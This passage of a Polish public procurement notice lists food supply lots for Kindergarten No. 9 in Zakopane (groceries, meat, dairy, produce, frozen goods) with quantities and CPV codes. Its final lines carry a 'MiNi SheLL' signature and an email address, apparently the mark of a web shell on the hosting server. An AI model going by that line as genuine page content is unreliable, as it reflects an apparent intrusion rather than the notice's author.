7.	Herbata typu Saga 100 szt.(torebki) lub równoważny	szt.	10
8.	Herbata granulowana 100g	szt.	90
9.	Herbata owocowa malinowa typu  Vitax 40g lub równoważny	szt.	60
10.	Herbata typu Irwing 100g lub równoważny	szt.	32
11.	Ketchup 490g typu Helmans łagodny lub równoważny	szt.	52
12.	Chrzan typu Polan 350g lub równoważny	szt.	30
13.	Kukurydza 400g	szt.	120
14.	Szczaw konserwowy 	szt.	70
15.	Maggi 1l typu Knorr lub równoważny	szt.	50
16.	Musztarda łagodna 175 g	szt.	20
17.	Cytrynka 1 l	szt.	50
18.	Miód wielokwiatowy 400 g	szt.	50
19.	Fasolka szparagowa R 2,60 kg puszka	szt.	30
20.	Koperek konserwowy 180 g	szt.	50
21.	Przecier ogórkowy 350 g	szt.	80
22.	Ogórki konserwowe 420 g 	szt.	64
23.	Koktajl owocowy puszka 3035 g 	szt.	10
24.	Koncentrat  pomidorowy 30% 850 g	szt.	50
25.	Brzoskwinia puszka 2500 g 	szt.	10
26.	Ananas puszka 3035 g 	szt.	10
27.	Sól jodowana 1kg	kg	150
28.	Ziele angielskie 15g	szt.	25
29.	Nutella szklanka 230g lub równoważny	szt.	72
30.	Liść laurowy 7g	szt.	15
31.	Kminek mielony 25g	szt.	15
32.	Proszek do pieczenia 30g	szt.	30
33.	Vegeta typu Podrawka 1 kg lub równoważny	szt.	30
34.	Kwasek cytrynowy 20g	szt.	50
35.	Płatki czekoladowe kuleczki Nestle 500g	szt.	150
36.	Płatki Kangusie 500g lub równoważny	szt.	80
37.	Ryż 5 kg  typu Kamis lub równoważny	szt.	10
38.	Kasza manna 1kg	kg	32
39.	Bułka tarta 500g wrocławska lub równoważny	kg	60
40.	Kasza jęczmienna wiejska 1 kg	kg	60
41.	Kasza pęczak 1 kg	kg	22
42.	Ryż biały 1 kg	kg	60
43.	Mąka ziemniaczana 1kg	kg	10
44.	Galaretka owocowa typu Winiary 80 g wiśniowa lub równoważny	szt.	300
45.	Kisiel typu Winiary 77g żurawina , morela	szt.	300
46.	Budyń typu Winiary 60 g śmietankowy lub równoważny	szt.	180
47.	Kawa Inka 150g lub równoważny	szt.	110
48.	Kakao ciemne 200g	szt.	32
49.	Kakao rozpuszczalne 600g	szt.	78
50.	Biszkopty 140 g podłużne	szt.	320
51.	Czekolada w proszku1 kg	szt.	12
52.	Czekolada mleczna 100g	szt.	220
53.	Cukierki z galaretką 2,80 kg	szt.	12
54.	Bulion grzybowy typu Knorr 60 g lub równoważny	szt.	30

55.	Bulion cielęcy typu Knorr 160 g lub równoważny	szt.	50
56.	Delikt do mięsa typu Knorr 700 g lub równoważny	szt.	20

57.	Groszek ptysiowy 80 g 	szt.	180
58.	Płatki Cheerios 500 g lub równoważny	szt.	60
59.	Płatki kukurydziane 1 kg	szt.	80
60.	Cynamon 600 g	szt.	1
61.	Tuńczyk w oleju 1705 g	szt.	15
62.	Makrela w pomidorach 170 g	szt.	240
63.	Olej kujawski 3 l lub równoważny	szt.	96
64.	Oliwa z oliwek	szt.	15
65.	Pomidor puszka 2550 g	szt.	48
66.	Pieprz mielony 1 kg	szt.	1
67.	Pasztet podlaski 150 g lub równoważny	szt.	168
68.	Sok malinowy typu Herbapol 420 ml lub równoważny	szt.	36
69.	Sok pomarańczowy typu Tymbark 2 l lub równoważny	szt.	240

70.	Sok jabłkowy typu Tymbark 2 l lub równoważny	szt.	120
71.	Sok marchwiowo-jabłkowy 1l	szt.	192
72.	Sok pomarańczowy 200 ml	szt.	1080
73.	Sos do spaghetti typu Knorr 1 kg lub równoważny	szt.	10

74.	Sos myśliwski typu Winiary 33 g lub równoważny	szt.	120

75.	Sos owocowy 1 l	szt.	10
76.	Wafelki śmietankowe Skawa 20 g lub równoważny	szt.	1470

77.	Princessa mleczna  37 g lub równoważny	szt.	840

78.	Prince polo 36 g lub równoważny	szt.	770
79.	Wafelki Elitesse Skawa 20 g lub równoważny	szt.	600
80.	Woda mineralna Muszynianka niegaz. lub równoważny	szt.	900
81.	Zasmażka jasna typu Knorr 1 kg lub równoważny	szt.	4

82.	Bazylia 230 g	szt.	2
83.	Oregano 230 g	szt.	1
84.	Papryka czerwona słodka 0,5 kg	szt.	3
85.	Majeranek 230 g	szt.	2
86.	Koncentrat buraczany 300ml	szt.	60
87.	Przyprawa do ryb 800 g	szt.	1
88.	Makaron muszelkitypu Lubella 0,50 kg lub równoważny	szt.	120
89.	Makaron literki typu Kamis 0,50 kg lub równoważny	szt.	36

90.	Makaron świderki typu Lubella 0,50 lub równoważny	szt.	90

91.	Makaron łazanka typu Lubella 0,50 lub równoważny	szt.	84

92.	Makaron spaghetti typuLubella 0,50 kg lub równoważny	szt.	100

93.	Makaron kokardki typLubella 0,50 kg lub równoważny	szt.	60
94.	Makaron gwiazdki typ Lubella 0,50 kg lub równoważny	szt.	48

95.	Makaron nitka typu Czaniecki 0,25 kg lub równoważny	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu, wyrobów drobiarskich na potrzeby Przedszkola Nr 9 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą mięsa i podrobów, wyrobów wędliniarskich, drobiu, wyrobów drobiarskich  na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10
Zakres zamówienia obejmuje; 
1.	Filet z indyka pieczony	kg	28
2.	Kiełbasa szynkowa	kg	28
3.	Kiełbasa podwawelska	kg	30
4.	Pasztet pieczony drobiowy	kg	35
5.	Polędwica drobiowa	kg	28
6.	Polędwica sopocka	kg	31
7.	Szynka konserwowa	kg	28
8.	Szynka gotowana 	kg	85
9.	Wędzonka krotoszyńska	kg	16
10.	Rozbef wołowy	kg	120
11.	Kiełbasa krakowska sucha	kg	30
12.	Parówka cienka Babuni	kg	60
13.	Kości wieprzowe 	kg	150
14.	Schab b/k	kg	200
15.	Szynka b/k surowa	kg	180
16.	Żołądki drobiowe	kg	60
17.	Wątroba drobiowa	kg	60
18.	Łopatka b/k	kg	80
19.	Karkówka b/k	kg	120
20.	Ogony 	kg	150
21.	Boczek b/k wędzony	kg	75
22.	Słonina	kg
	  22
23.	Szponder wołowy	kg	80
24.	Pieczeń wołowa	kg
	60
25.	Cielęcina -pieczeń	kg	60
26.	Filet z kurczaka	kg	160
27.	Kurczak świeży	kg	80
28.	Udka z kurczaka	kg	35
29.	Filet z indyka	kg	105.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa produktów mleczarskich na potrzeby Przedszkola nr 9 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą produktów mleczarskich  na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10
1.	Śmietana 36 %  l l	szt.	   50
2.	Mleko 2,5 %  	l	4100
3.	Masło 82%  0,20 kg	szt.	  750
4.	Twaróg tłusty 0,20	szt.	366
5.	Serek homogen. owocowy 150g mix	szt.	1020
6.	Ser żółty salami lub równoważny	kg	  45
7.	Ser żółty edamski lub równoważny	kg	40
8.
	Jogurt  typu Jogobella 150g lub równoważny	szt.

	660
  9.	Jogurt typu Danonek  50g lub równoważny	szt	880

10.	Serek topiony kremowy	kg	22

11.	Śmietana 18 % 380 g	szt	660
12.	Jogurt naturalny 370 g	szt	96
13.	Kefir 370 g	szt	72
14.	Deser typu Monte max 100g lub równoważny	szt	1020
15.	Margaryna mleczna 250 g	szt	320
16.	Margaryna Flora 250 g lub równoważny	szt	60


 Zakres zamówienia obejmuje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa owoców i warzyw na potrzeby Przedszkola Nr 9 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą  owoców i warzyw  na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10

 Zakres zamówienia obejmuje 

1.	Banany	kg	500
2.	Buraki ćwikłowe	kg	315
3.	Cebula	kg	160
4.	Cytryny	kg	5
5.	Fasola Jaś	kg	25
6.	Groch łuszczony połówki	kg	25
7.	Gruszki	kg	200
8.	Jabłka deserowe	kg	640
9.	Jaja kurze I klasa	szt.	5700
10.	Kalafior	szt.	70
11.	Kapusta biała	szt.	150
12.	Kapusta czerwona	szt.	40
13.	Kapusta kwaszona	kg	140
14.	Mandarynki	kg	100
15.	Marchew	kg	500
16.	Ogórek kiszony	kg	70
17.	Ogórek świeży	kg	60
18.	Papryka świeża	kg	15
19.	Pieczarki	kg	60
20.	Pietruszka	kg	150
21.	Pomidor	kg	80
22.	Rzodkiewka	szt.	60
23.	Sałata zielona	szt.	80
24.	Seler	kg	130
25.	Szczypior	pęcz	160
26.	Śliwki	kg	60
27.	Ziemniaki	kg	6000
28.	Pietruszka natka 25g	szt.	400
29.	Por	szt.	260
30.	Koperek 25g	pęcz	340
31.	Kapusta pekińska	szt.
	100

32.	Czosnek	szt.
	140

33.	Rabarbar	kg
	40

34.	Truskawki 
	kg
	140

35.	Maliny
	kg
	120

36.	Kiwi
	szt.
	1100

37.	Mandarynki
	Kg
	120

38	Pomarańcza	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mrożonek na potrzeby Przedszkola Nr 9 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą  mrożonek  na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10

 Zakres zamówienia obejmuje 

1.	Filet mintaj płaty Szater lub równoważne	kg	260
2.	Kalafior 450g	kg	50
3.	Truskawki mrożone 450 g	kg	26
4.	Mieszanka kompotowa 450 g	kg	250
5.	Mieszanka warzywna 450 g	kg	50
6.	Brokuły 	kg	65.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com